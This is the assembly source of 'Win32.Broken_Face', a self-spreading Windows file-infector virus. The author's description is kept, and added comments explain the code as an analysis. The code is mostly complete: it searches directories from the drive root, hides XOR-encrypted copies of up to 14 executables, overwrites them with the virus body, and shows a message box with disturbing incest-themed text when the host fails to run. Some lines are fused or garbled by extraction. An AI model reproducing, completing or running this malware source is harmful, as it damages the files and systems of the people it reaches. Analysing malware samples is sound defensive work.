BRFA.ASM


; ___________________

; | Win32.Broken_Face |

; | __________________ |

; ___________ ||

[Information]

First, the virus moves to the root directory and scans for

directories. It enters one and checks for executables. If

; no files are found or more files are needed, it looks in the

current directory for another subdirectory. If there isn't any,

; it goes back and enters another directory, etc. It encrypts

host files (marked with _ in front of their name).

When it's time to execute a host, it decrypts it into a

file marked with $, executes it, and keeps deleting it

until the executed file exits, so the decrypted file disappears.

Sick method, could not think of anything else, but it

works fine. Infected hosts keep the original size if

they are smaller than 8192 bytes. That's all. Be careful

if you think of experimenting with it; it spreads fast.

.386

.MODEL FLAT

.DATA

; ---------------------------------------------------------------------
; Virus state (analysis annotations). Labels are the author's; the role
; of each variable is taken from how .code reads and writes it.
; ---------------------------------------------------------------------

Fuck DD 0                       ; -> terminating 0 of the virus's own path (written at MONDAY)

SHIT DD 0                       ; CopyFile mode: 66 = XOR-transform each chunk via ENCHOST, 0 = plain copy

ftel DD?                        ; -> the virus's own path inside the command line (just past the opening quote)

TDATA DB 318 DUP (?)            ; WIN32_FIND_DATAA scratch; only used to test whether the "_" copy already exists

Target DD?                      ; CopyFile source handle (opened GENERIC_READ)

NBYTES DD 0                     ; byte count of the last ReadFile / WriteFile

NewHandle DD?                   ; CopyFile destination handle (opened GENERIC_WRITE)

Depth DB 0                      ; directory nesting level below Root; GetBack goes to Relend when it is 0

FileHandle DB 40 DUP (?)        ; 10 x DWORD: the directory-enumeration handle of each nesting level, indexed by EDI

Find_Data DB 3180 DUP (?)       ; 10 x WIN32_FIND_DATAA (318 bytes each): one per nesting level, indexed by ESI

XDATA DB 318 DUP (?)            ; WIN32_FIND_DATAA of the *.exe enumeration; cFileName starts at offset 44

FILES2EAT DB 0EH                ; infection budget per run (14); decremented at End

XHANDLE DD 0                    ; find handle of the *.exe enumeration in the current directory

; Text of the MessageBoxA shown when WinExec of the decrypted host fails (Relend).
; Together with Tag it is a usable string indicator for this sample.

MSG DB "There Was this Boy", 0DH, "WHO Had Two Chlidren", 0DH

DB "with his sisters", 0DH, "They Were His Daughters", 0DH

DB "They Were His Favourite Lovers", 0DH, "I Got No Lips, I Got No Tounge"

DB 0DH, "WHERE THERE ERE EYES THERE'S Only Space", 0DH

DB "I Got No lips, I Got No Tounge", 0DH, "I Got A Broken Face!", 0

.code

EXTRN EXITPROCESS: PROC

EXTRN Messageboxa: Proc

EXTRN FINDFIRSTFILEA: PROC

EXTRN FINDNEXTFILEA: PROC

EXTRN SETCURRENTDIRECTORYA: PROC

EXTRN Deletefilea: Proc

EXTRN FINDCLOSE: PROC

EXTRN CREATEFILEA: PROC

EXTRN GETCURRENTDIRECTORYA: PROC

EXTRN READFILE: PROC

EXTRN WRITEFILE: Procextrn CloseHandle: Proc

EXTRN WINEXEC: PROC

EXTRN GETCOMMANDLINEA: PROC

EXTRN CREATEPROCESSA: PROC

;-----------------------------------------------------------------------
; Start: entry point of Win32.Broken_Face (analysis annotations only).
; Flow: locate own path in the command line -> chdir Root -> depth-first
; walk of subdirectories (Find1stdir / Find2nddir / GetBack) -> for each
; *.exe (Infect) write an XOR-transformed hidden copy "_<name>" and
; overwrite the original with the virus body -> after FILES2EAT attempts
; (End) decrypt and run the host (Relend), then exit.
; Registers across the walk: EBP -> 1024-byte stack I/O buffer,
; ESI = byte offset of this level's Find_Data slot, EDI = byte offset of
; this level's FileHandle slot, BH = saved XDATA[43], [Depth] = level.
; On-disk artifacts: a hidden "_<host>.exe" next to each infected host and
; a transient "$<host>.exe" while the decrypted host runs.
;-----------------------------------------------------------------------

Start:

SUB ESP, 1024                   ; reserve the 1024-byte buffer used by CopyFile

MOV EBP, ESP                    ; EBP -> that buffer (lpBuffer in CopyFile)

Call getcommandlinea

INC EAX                         ; skip the opening quote of the quoted program path

MOV [ftel], EAX                 ; ftel -> own path

LAOS:                           ; scan forward to the closing quote

CMP Byte Ptr [EAX], '"

Je Monday

INC EAX

JMP laos

MONDAY:

MOV BYTE PTR [EAX], 0           ; terminate the path in place (the command-line buffer is modified)

Mov DWORD PTR [fuck], EAX       ; fuck -> the terminator (DENCRYPT scans backwards from here)

Push offset root

Call setCurrentDirectorya       ; start the walk at Root

XOR ESI, ESI; offset into Find_Data: this level's WIN32_FIND_DATAA

XOR EDI, EDI; offset into FileHandle: this level's find handle

Find1stdir:                     ; begin enumerating subdirectories of the current directory

Lea Eax, [Find_Data ESI]        ; &Find_Data[ESI]

Push EAX

Push Offset Dirmasker           ; "*." mask (see Dirmasker)

Call FindfirstFilea

Mov DWORD PTR [FileHandle EDI], EAX  ; keep the handle for FindNextFileA / FindClose at this level

CMP DWORD PTR [Find_Data ESI], 10h; dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY exactly (entries with extra attribute bits are skipped)

JNE FIND2NDDIR

CMP BYTE PTR [Find_Data ESI 44], "."  ; cFileName[0] == '.' -> skip "." / ".."

JE FIND2NDDIR

Getin:                          ; descend into the directory named in this level's cFileName

Lea Eax, [Find_Data 44 ESI]

Push EAX

Call setCurrentDirectorya

Inc Byte Ptr [Depth]

Push Offset XData

Push Offset EXEFILE             ; executable mask (see Exefile)

Call FindfirstFilea

CMP EAX, -1                     ; INVALID_HANDLE_VALUE: no executables here

JNZ FNE1

DAM:                            ; no (more) executables: go one level deeper

Add Edi, 4                      ; next FileHandle slot

Add ESI, 313                    ; next Find_Data slot (stride as extracted)

JMP Find1stdir

FNE1:

MOV BH, BYTE PTR [xData 43]     ; save the byte just before cFileName; Infect overwrites it with '_'

MOV [xhandle], EAX              ; handle of the *.exe enumeration

JMP Infect

Fne2:                           ; next executable in the current directory

MOV Byte PTR [xData 43], BH     ; restore the byte clobbered in Infect

Push Offset XData

Mov eax, [xhandle]

Push EAX

Call FindnextFilea

OR EAX, EAX

JZ DAM                          ; enumeration exhausted

Infect:

CMP Byte PTR [xData 44], '_'    ; names starting with '_' are the virus's own copies: skip

JE FNE2

MOV BH, BYTE PTR [xData 43]

MOV Byte PTR [xData 43], '_'    ; build "_<name>" in place, starting one byte before cFileName

Push Offset TData

Push offset xData 43

Call FindfirstFilea             ; does "_<name>" already exist?

CMP EAX, -1

JNZ Fne                         ; exists -> treated as already infected (target label as extracted)

DMF:                            ; create the hidden "_<name>" copy

XOR EDX, EDX

Push Edx                        ; hTemplateFile = NULL

Push 2                          ; dwFlagsAndAttributes = FILE_ATTRIBUTE_HIDDEN

Push 1                          ; dwCreationDisposition = CREATE_NEW

Push Edx                        ; lpSecurityAttributes = NULL

Push Edx                        ; dwShareMode = 0

Push 40000000H                  ; dwDesiredAccess = GENERIC_WRITE

Push offset xData 43            ; lpFileName = "_<name>"

Call Createfilea

CMP EAX, -1

Je end; failed. Back in the box :( (still counted against FILES2EAT at End)

MOV [newHandle], EAX

XOR EDX, EDX

Push Edx                        ; hTemplateFile = NULL

Push Edx                        ; dwFlagsAndAttributes = 0

Push 3                          ; dwCreationDisposition = OPEN_EXISTING

Push Edx                        ; lpSecurityAttributes = NULL

Push Edx                        ; dwShareMode = 0

Push 80000000H                  ; dwDesiredAccess = GENERIC_READ

Push Offset XData 44            ; lpFileName = original host name

Call Createfilea

MOV [Target], EAX               ; source = original host

MOV BYTE PTR [shit], 66         ; CopyFile: XOR-transform each chunk

Call CopyFile                   ; host -> "_<name>" (transformed); closes both handles and clears SHIT

Call fTopen                     ; Target = own executable (path at ftel), read-only

xor edx, edxpush edx            ; (two statements fused by extraction) hTemplateFile = NULL

PUSH 80                         ; dwFlagsAndAttributes (value as extracted)

Push 3                          ; dwCreationDisposition = OPEN_EXISTING (no truncation: a host larger than the virus body keeps its length)

Push Edx                        ; lpSecurityAttributes = NULL

Push Edx                        ; dwShareMode = 0

Push 40000000H                  ; dwDesiredAccess = GENERIC_WRITE

Push Offset XData 44            ; lpFileName = original host name

Call Createfilea

MOV [newHandle], EAX

Call CopyFile                   ; virus body -> host, plain copy (SHIT is 0 after the previous CopyFile)

JMP end

GetBack:                        ; this level's directory listing is exhausted

CMP Byte PTR [DEPTH], 0

Je Relend                       ; back at Root with nothing left: run the host

Dec byte PTR [Depth]

Push DWORD PTR [EDI FileHandle]

Call FindClose

SUB ESI, 313                    ; previous Find_Data slot

SUB EDI, 4                      ; previous FileHandle slot

Push Offset CDBACK              ; ".."

Call setCurrentDirectorya

JMP FIND2NDDIR                  ; resume the parent's listing

Goroot:                         ; resets the walk to Root; no jump to this label appears in this listing

XOR ESI, ESI

Mov EDI, ESI

MOV BYTE PTR [DEPTH], 0

Push offset root

Call setCurrentDirectorya; chdir Root

Find2nddir:                     ; next subdirectory entry at the current level

Lea Eax, [Find_Data ESI]

Push EAX

Push DWORD PTR [FileHandle EDI]

Call FindnextFilea

OR EAX, EAX

JZ GetBack                      ; no more entries

CMP DWORD PTR [Find_Data ESI], 10h   ; same filters as Find1stdir

JNE FIND2NDDIR

CMP BYTE PTR [Find_Data ESI 44], '.'

JE FIND2NDDIR

JMP Getin

End:                            ; one infection attempt finished

Dec byte PTR [files2eat]

CMP Byte Ptr [Files2eat], 0

JNE FNE2                        ; budget left: next executable in this directory

Relend:                         ; run the original program

Call Dencrypt                   ; writes the decrypted host to "$<name>" and repoints ftel at it

Push 5                          ; uCmdShow = SW_SHOW

Push dword PTR [ftel]

Call Winexec

CMP EAX, 31                     ; WinExec returns > 31 on success

JG Fuckup

PUSH 0                          ; uType = MB_OK

Push Offset Tag 1               ; lpCaption (offset as extracted)

Push Offset MSG                 ; lpText

PUSH 0                          ; hWnd = NULL

Call Messageboxa                ; host could not be started: show the payload text instead

JMP Deadend

Fuckup:                         ; host is running: busy-loop deleting "$<name>" until DeleteFileA succeeds

Push dword PTR [ftel]

Call Deletefilea

OR EAX, EAX

JZ Fuckup

Deadend:

PUSH 0                          ; uExitCode = 0

Call EXITPROCESS

; String constants used by the walk; the author placed them in .code after
; the entry point. Values as extracted.

Exefile db '* .exe', 0          ; FindFirstFileA mask for executables

Dirmasker db '*.', 0            ; FindFirstFileA mask for directory entries

Root db 'c: /', 0               ; starting directory of the walk

CDBACK DB '..', 0               ; used by GetBack to return to the parent directory

Tag DB '[Broken_Face', 0, 'Coded by Supermovah / Misp]'   ; MessageBox caption (from offset 1) plus author credit; string indicator

;-----------------------------------------------------------------------
; CopyFile (local routine, not the Win32 CopyFileA)
; Copies [Target] -> [NewHandle] in 1024-byte chunks through the stack
; buffer at EBP. While [SHIT] == 66 every chunk is passed through ENCHOST
; (keyed XOR) before it is written; XOR is its own inverse, so the same
; path decrypts. When ReadFile returns 0 bytes both handles are closed
; and SHIT is cleared.
; In:    EBP -> 1024-byte buffer, [Target], [NewHandle], [SHIT]
; Out:   [NBYTES] = last transfer size, [SHIT] = 0, both handles closed
; Clobb: EAX, ECX, BX, flags
;-----------------------------------------------------------------------

CopyFile:

PUSH 0                          ; lpOverlapped = NULL

Push offset nbytes              ; lpNumberOfBytesRead

PUSH 1024                       ; nNumberOfBytesToRead

Push EBP                        ; lpBuffer

Mov Eax, [Target]

Push EAX                        ; hFile

Call readfile

Mov Eax, [NBYTES]

OR EAX, EAX

JZ GBGB                         ; 0 bytes read: source exhausted

CMP Byte PTR [Shit], 66

Je Encyost                      ; transform mode (target label as extracted; the routine below is ENCHOST)

BCK:                            ; write the chunk (transformed or not)

PUSH 0                          ; lpOverlapped = NULL

Push offset nbytes              ; lpNumberOfBytesWritten

Push [NBYTES]                   ; nNumberOfBytesToWrite

Push EBP                        ; lpBuffer

Mov Eax, [NewHandle]

Push EAX                        ; hFile

Call writefile

JMP CopyFile                    ; next chunk

GBGB:                           ; done: close both handles, back to plain-copy mode

Push DWORD PTR [NewHandle]

Call Closehandle

Push DWORD PTR [Target]

Call Closehandle

MOV BYTE PTR [shit], 0

RET

ENCHOST:                        ; keyed XOR over the buffer: key word BX += CX per step while CX counts down from 100h

PUSH ESI

MOV ESI, EBP                    ; ESI -> buffer

MOV ECX, 100HXOR BX, BX         ; (two statements fused by extraction) ECX = word count, BX = 0

ENCH:

Add BX, CX                      ; running key = sum of the remaining counts

XOR Word PTR [ESI], BX

Inc ESI

Inc ESI                         ; next word; the span is transformed regardless of NBYTES

Loop ench

POP ESI

MOV BYTE PTR [shit], 66         ; stay in transform mode for the next chunk

JMP BCK

;-----------------------------------------------------------------------
; DENCRYPT: rebuild the host from its hidden "_" copy so it can be run.
; 1. Rewrite the path at ftel in place from ".../name" to ".../_name"
;    (the file name and its terminator are shifted right by one byte).
; 2. fTopen: Target = that "_name" file, read-only.
; 3. Change the '_' to '$' and create "$name" (hidden, CREATE_NEW) as
;    NewHandle; CopyFile with SHIT=66 applies the self-inverse XOR again.
; On return ftel names the "$name" path that Relend passes to WinExec.
; In:    [fuck] -> terminator of the own path, [ftel] -> start of it,
;        ECX = bound of the backward scan (not set here; whatever the
;        caller left in it)
; Clobb: AL, BL, ECX, EDX, ESI, flags; the command-line buffer is modified
;-----------------------------------------------------------------------

DENCRYPT:

MOV ESI, DWORD PTR [fuck]       ; ESI -> end of own path

Tuesday:                        ; scan backwards to the last path separator

CMP Byte PTR [ESI], '/'         ; separator as extracted

Je Google

Dec ESI

Loop Tuesday                    ; bounded only by the inherited ECX

Google:

Inc ESI                         ; ESI -> first byte of the file name

MOV Al, Byte Ptr [ESI]

MOV BYTE PTR [ESI], '_'         ; the name now starts with '_'

Friday:                         ; shift the rest of the name right by one, alternating through AL and BL

Inc ESI

MOV BL, BYTE PTR [ESI]

MOV BYTE PTR [ESI], Al

CMP Byte PTR [ESI], 0           ; the byte just stored was the old terminator -> done

JZ Sunday

Inc ESI

MOV Al, Byte Ptr [ESI]

MOV BYTE PTR [ESI], BL

CMP Byte PTR [ESI], 0

JNZ frIDay

Sunday:

Call fTopen                     ; Target = "_name" (transformed host), read-only

MOV ESI, DWORD PTR [ftel]

Ghho:                           ; find the '_' inserted above (scan starts at ftel+1)

Inc ESI

CMP Byte Ptr [ESI], '_'

Jne Ghho

MOV BYTE PTR [ESI], '$'         ; the path now names "$name"

XOR EDX, EDX

Push Edx                        ; hTemplateFile = NULL

Push 2                          ; dwFlagsAndAttributes = FILE_ATTRIBUTE_HIDDEN

Push 1                          ; dwCreationDisposition = CREATE_NEW

Push Edx                        ; lpSecurityAttributes = NULL

Push 1                          ; dwShareMode = FILE_SHARE_READ

Push 40000000H                  ; dwDesiredAccess = GENERIC_WRITE

Push dword PTR [ftel]           ; lpFileName = "$name"

Call Createfilea

MOV [newHandle], EAX

MOV BYTE PTR [shit], 66         ; CopyFile applies the XOR again, which undoes it

Call CopyFile                   ; "_name" -> "$name", decrypted

RET

;-----------------------------------------------------------------------
; FTOPEN: [Target] = CreateFileA([ftel], GENERIC_READ, FILE_SHARE_READ,
;         NULL, OPEN_EXISTING, 0, NULL)
; Opens whatever path ftel currently names (the virus itself when called
; from Infect, the "_name" copy when called from DENCRYPT) as the
; CopyFile source. The returned handle is stored as-is.
; Clobb: EAX, EDX, flags
;-----------------------------------------------------------------------

FTOPEN:

XOR EDX, EDX

Push Edx                        ; hTemplateFile = NULL

Push Edx                        ; dwFlagsAndAttributes = 0

Push 3                          ; dwCreationDisposition = OPEN_EXISTING

Push Edx                        ; lpSecurityAttributes = NULL

Push 1                          ; dwShareMode = FILE_SHARE_READ

Push 80000000H                  ; dwDesiredAccess = GENERIC_READ

Push dword PTR [ftel]           ; lpFileName

Call Createfilea

MOV [Target], EAX

RET

End Start

; 2-9-2004

